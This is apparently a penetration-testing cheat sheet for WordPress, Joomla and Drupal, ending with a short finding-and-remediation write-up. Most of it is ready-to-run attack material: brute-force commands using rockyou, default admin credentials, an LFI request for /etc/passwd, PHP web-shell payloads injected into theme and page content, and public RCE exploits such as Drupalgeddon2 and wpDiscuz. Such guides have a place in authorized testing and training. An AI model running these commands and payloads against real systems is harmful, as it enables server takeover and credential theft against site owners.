Common Apps CMS WordPress Joomla Drupal

🛡️ Methodology Checklist

• WordPress: wpscan --url http://[TARGET] --enumerate u,p,t
• WordPress default login: /wp-login.php — admin/admin, admin/password
• WordPress plugin vulns: wpscan --url [TARGET] --enumerate vp --plugins-detection aggressive
• Joomla: joomscan --url http://[TARGET]
• Joomla admin: /administrator/ — default creds
• Drupal: droopescan scan drupal -u http://[TARGET]
• All CMS: check version in source/changelog for CVEs
• Authenticated RCE: theme/plugin editor or extension upload

---

🎯 Operational Context

Use when: CMS identified — enumerate plugins/themes for known CVEs, check default credentials, exploit authenticated RCE via plugin upload. Think Dumber First: wpscan --url http://[TARGET] --enumerate vp,u --api-token [TOKEN] for WordPress — finds vulnerable plugins in 2 minutes. Admin creds (admin/admin, admin/password) work more than expected on unmanaged CMS installs. Skip when: CMS is fully patched and hardened — pivot to application logic vulnerabilities in custom plugins/themes.

---

⚡ Tactical Cheatsheet

Command	Tactical Outcome
curl -s http://[TARGET_IP]/ | grep WordPress	Confirm WordPress + version
curl -s http://[TARGET_IP]/wp-content/plugins/[PLUGIN]/readme.txt | grep -i "Stable tag"	Leak plugin version for CVE matching
wpscan --url http://[TARGET_IP] --enumerate --api-token [TOKEN]	Full WP enumeration (plugins, themes, users, vulns)
wpscan --url http://[TARGET_IP] --password-attack xmlrpc -t 20 -U [USER] -P /usr/share/wordlists/rockyou.txt	WP brute force via XML-RPC (bypasses login lockout)
curl "http://[TARGET_IP]/wp-content/themes/twentynineteen/404.php?0=id"	Trigger WP theme shell (after injecting system($_GET[0]); into 404.php)
curl -s "http://[TARGET_IP]/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"	mail-masta 1.0.0 unauthenticated LFI
python3 wp_discuz.py -u http://[TARGET_IP] -p "/?p=1"	wpDiscuz 7.0.4 unauthenticated file upload RCE
curl -s http://[TARGET_IP]/administrator/manifests/files/joomla.xml | xmllint --format -	Joomla version (gold standard)
droopescan scan joomla --url http://[TARGET_IP]/	Joomla automated enumeration
sudo python3 joomla-brute.py -u "http://[TARGET_IP]" -w [WORDLIST] -usr [USERNAME]	Brute-force the Joomla administrator portal
curl -s "http://[TARGET_IP]/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id"	Joomla template shell trigger (after injecting system($_GET['...']);)
python3 CVE-2019-10945.py --url "http://[TARGET_IP]/administrator/" --username [USER] --password [PASS] --dir /	Joomla dir traversal
curl -s http://[TARGET_IP]/CHANGELOG.txt | grep -m2 ""	Drupal version (legacy — 404 on modern installs)
droopescan scan drupal -u http://[TARGET_IP]	Drupal automated enumeration
curl -s "http://[TARGET_IP]/node/[ID]?[PARAM]=id"	Drupal PHP filter RCE trigger
python3 drupalgeddon2.py http://[TARGET_IP]/	Drupalgeddon2 (CVE-2018-7600) pre-auth RCE

---

🔬 Deep Dive & Workflow

WordPress Attack Decision Tree

No creds:
├── Enumerate users via /wp-login.php error messages
├── Check XML-RPC enabled → wpscan --password-attack xmlrpc
└── Check plugin versions → match CVE
    ├── mail-masta 1.0.0 → LFI (count_of_send.php?pl=/etc/passwd)
    └── wpDiscuz 7.0.4 → unauthenticated RCE (file upload)

Have admin creds:
├── Appearance → Theme Editor → inactive theme 404.php
│   → inject: system($_GET[0]);
│   → curl "http://[TARGET]/wp-content/themes/[THEME]/404.php?0=id"
└── MSF: exploit/unix/webapp/wp_admin_shell_upload
     → set VHOST [domain] (CRITICAL — WP uses host header routing)

WordPress Pitfalls

Issue	Fix
WPScan misses plugins	Manually grep plugins from page source
MSF module fails	set VHOST [hostname] — WP requires correct Host header
Theme Editor missing	DISALLOW_FILE_EDIT=true in wp-config.php → pivot to plugin CVE
Zsh breaks URL with ?	Wrap all URLs in double quotes

Joomla Attack Flow

1. Fingerprint: robots.txt with /administrator/, /bin/, /cli/ = Joomla
2. Version: /administrator/manifests/files/joomla.xml → exact patch level
3. No creds → droopescan → joomla-brute.py
4. Admin creds → Templates → select template → edit error.php
   → inject: system($_GET['PARAM']);
   → curl "http://[TARGET]/templates/[TEMPLATE]/error.php?PARAM=id"
5. Joomla < 3.9.4 → CVE-2019-10945 directory traversal

Fix display error: Disable “Quick Icon - PHP Version Check” plugin if “null” error on login.

Drupal Attack Flow

Drupal < 8: PHP Filter module enabled by default
→ Modules → enable PHP filter → Content → Add content → Basic page
  → body: <?php system($_GET['cmd']); ?>
  → Text format: PHP code
  → curl "http://[TARGET]/node/[ID]?cmd=id"

Drupal 8+: PHP filter must be manually installed
→ Or: upload backdoored module (add .htaccess to bypass 403)

Drupalgeddon (CVE-2014-3704): SQLi → create admin user
Drupalgeddon2 (CVE-2018-7600): Pre-auth RCE
Drupalgeddon3 (CVE-2018-7602): Auth RCE (needs node delete perms)
→ MSF: exploit/multi/http/drupal_drupageddon2
→ set VHOST [hostname]

Critical: Drupal stores DB creds in sites/default/settings.php — always read this via LFI.

---

🛠️ Troubleshooting & Edge Cases

Problem	Cause	Fix
wpscan returns no vulnerabilities	API token missing	Get free token at wpscan.com; without token, no CVE data is returned
Joomla admin login blocked	IP-based restriction	Try: /administrator/index.php from different path; check if admin panel on different port
WordPress plugin upload blocked	Non-admin account	Find admin creds via brute or credential stuffing; plugin upload requires admin
Drupal exploit module fails	Version too new or patched	Check Drupalgeddon2 (CVE-2018-7600) vs Drupalgeddon3 (CVE-2018-7602) — different target versions
CMS version hidden	Remove generator meta tag	Use HTTP headers and response content differences: X-Generator, response body signatures

---

📝 Reporting Trigger

Finding Title: CMS Vulnerability Enables Unauthenticated Remote Code Execution Impact: Unpatched CMS vulnerability (WordPress plugin, Joomla, Drupal core) allows unauthenticated remote code execution or authenticated admin-to-RCE escalation, compromising the web server and potentially the underlying host. Root Cause: Outdated CMS or plugin without security patches applied. Default or weak administrator credentials. No WAF protection on CMS admin endpoints. Recommendation: Implement automatic CMS and plugin updates. Remove unused plugins and themes. Apply WAF rules for known CMS attack patterns. Enforce strong admin passwords and MFA on CMS admin panels. Regular CMS vulnerability scanning.

---

🔗 Related Nodes

• Common_Apps_Tomcat_Jenkins
• File_Upload_Attacks
• LFI_Path_Traversal_Bypasses